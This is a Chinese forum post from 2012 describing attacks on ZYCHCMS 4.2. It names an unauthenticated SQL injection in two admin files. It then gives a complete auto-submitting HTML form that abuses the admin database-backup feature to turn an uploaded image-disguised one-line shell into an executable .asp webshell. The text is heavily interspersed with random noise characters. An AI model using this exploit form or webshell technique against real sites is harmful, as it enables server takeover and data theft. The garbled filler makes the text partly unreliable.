4 a, X: a: }& _# y& O/ B
6 Z8 X* ~1 ^& Q4 \: ]+ C8 d) i; F$ u; v4 C" T l3 k- A
. g1 J) R8 Y& K7 s
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
- Z; L# d4 ^. b( d' ?; @' ` ①SQL注射漏洞
5 x' L+ J' i) i8 w5 g5 n% F1 @ 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp/ v* W1 c0 B2 F; x0 l; f
漏洞原因:未过滤0 V% c$ `# M6 X4 ?4 g4 n
漏洞代码:
$ Q5 S* o- F& a: J 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。8 M% H3 S' A7 J; s3 Y4 |4 `
修复方法:在文件开头加入代码
5 @% l- x9 H0 H 1 @/ X% V, I) Y* b) c0 w
+ v% Y n8 `0 V" n9 H' E②后台拿WBSHELL
9 d0 }& l! z, \% L* q 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
' W5 P& o( b) A6 A" _$ ]; U 这里在网上找了一个,改了下,将就着用。, s0 t/ {$ e3 J1 H) t# K
以下是代码本地提交代码3 w$ a* z* _. B
3 M3 \# z% L4 \( X
* F. ~: m, P* _7 Z. [% i4 Y# j<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add> b/ a% S) H9 [9 ?; y4 S
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
) g5 I+ K* w7 ?" r. e- U$ R <tr>
! F- J' ~+ S8 d0 z) R1 S' e' r. F <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
4 |6 @7 ^& y% Z! T9 U! X& z </tr>+ q7 Y& h) F3 x7 C
<tr># y* Y7 v1 d6 f! O/ R& F/ ?* `
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
; U3 D; t- N' A' q </span>
' c3 l ^2 o7 \: t <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >+ H; m4 r) ]: \" \" \" k
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
+ n+ [* `1 D0 y8 C2 U <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td> U5 p1 {5 ]* w+ ]1 U2 V+ n* b
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
# }+ n2 V. Y" K! A! o1 G <div align=”left”>9 v* s+ \6 | _0 K# R
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
' n+ u7 @5 d4 O' E: Z7 [, R3 Z <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>% S `: D2 d5 ~9 k
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />5 U4 j4 n1 X- S" i, f6 K- C8 A! ^
</div></td>
/ u3 l+ ]; A, K/ g. q </tr>
/ a0 H. q6 W8 _' |4 [" c5 R6 ?7 J <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
+ M) b- Q! a8 A) | x9 [ <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
+ o+ i. i. }: q; S <td class=”td”><div align=”left”>
. Q0 v% ]& a8 D3 u! h/ ]7 G( @ <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
1 \+ G, s( h# _* R: ~) \7 Q [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
# v) K0 S4 d- s </tr>
( k0 d' o1 K. y6 O <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>8 P3 s3 m$ D( B# j2 f g
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
6 G. R4 U1 @% s/ } <td class=”td”><div align=”left”>! g( u% J% V! u# f1 E7 ?# Y
<input type=”submit” value=”确定备份” class=”btn”
e% t# W5 e7 P k </div></td>
4 j7 Z8 o8 k# s5 \9 r, @ </tr>
# J7 B2 H1 d9 I' [/ O& ] </table></td></tr></form>5 ~) u8 F# b6 H3 h
</table>- t9 o }3 H, W- K+ C
</td>* [& U8 [. _1 B
</tr>) K; g* p5 I. a! S) O5 x6 y
</table>( s, i# W. {/ p' q; i) i& T" N
<script>) p4 z+ S0 H! T7 O4 T
document.all.add.submit();3 |( R5 r4 z7 r4 B. t# ?
</script>) d+ W9 V5 v: n5 \1 b
. v1 D8 S; K* Q2 ^* _( [
' a% _2 T7 g5 n# T- X4 I, T6 Q
_7 n2 J4 T( L% A
9 n6 Y0 K# {. z: o8 }8 x% t) }- f0 S( W" ^
7 @: u, }6 y( K, V; n: [
. S3 j g! p7 r$ V3 q- n
! r3 k# Z$ x- b1 p3 c: ]7 N2 v: Q4 v* s
0 s% Q; ?2 f/ ?+ m% N, @) {
|
发表于 2012-9-10 21:09:51
收藏
支持
反对